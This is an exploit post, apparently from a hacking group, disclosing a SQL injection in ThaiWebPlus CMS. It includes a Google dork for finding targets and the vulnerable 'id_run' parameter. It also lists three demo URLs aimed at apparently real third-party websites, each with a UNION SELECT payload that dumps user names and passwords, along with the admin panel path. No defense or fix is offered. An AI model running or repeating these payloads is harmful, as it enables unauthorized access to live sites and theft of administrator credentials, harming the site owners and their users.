facebook facebook twitter rss

ThaiWebPlus CMS Sql Injection Vulnerability

Author: Iran Cyber Security Group , Published: 25-07-2015
###################################################

#

# [+] Exploit Title: ThaiWebPlus CMS Sql Injection Vulnerability

# [+] Google Dork: Powered by ThaiWebPlus

# [+] Exploit Author: Iran Cyber Security Group

# [+] Discovered By: Pi.Hack

# [+] Vendor Homepage: http://thaiwebplus.com

# [+] Version: All version

# [+] Tested on: Windows & Linux

#

###################################################

#

# [+] Exploit:

# [+] http://localhost/index.php?Content=product&id_run=[ID]'[Sql Injection]

#

###################################################

#

# [+] Proof:

# [+] http://localhost/index.php?Content=product&id_run=[ID]' [Not loaded]

#

###################################################

#

# [+] Demo:

# [+] http://www.yingphaiboon-aquarium.com/index.php?Content=product&id_run=-30+union+select+1,2,3,group_concat%28user,0x3a,pws%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+user--

# [+] http://88part.com/index.php?Content=product&id_run=-3+union+select+1,2,3,group_concat%28user,0x3a,pws%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+user--

# [+] http://ampcooling.com/index.php?Content=service&id_run=-1+union+select+1,2,3,group_concat%28user,0x3a,pws%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+user--

#

###################################################

#

# Admin Page:

# site.com/_admin/

#

###################################################

# Contact mail: uid.root@yahoo.com

# Skype: uid.root

# Home Page : www.Iran-Cyber.Org

# Thanks To : root3r | MOHAMAD-NOFOZI | KamraN HellisH | JOK3R | WH!T3_W01F | CRY$I$ BL4CK | And All Members Of Iran-Cyber.Org

###################################################

Like us on Facebook :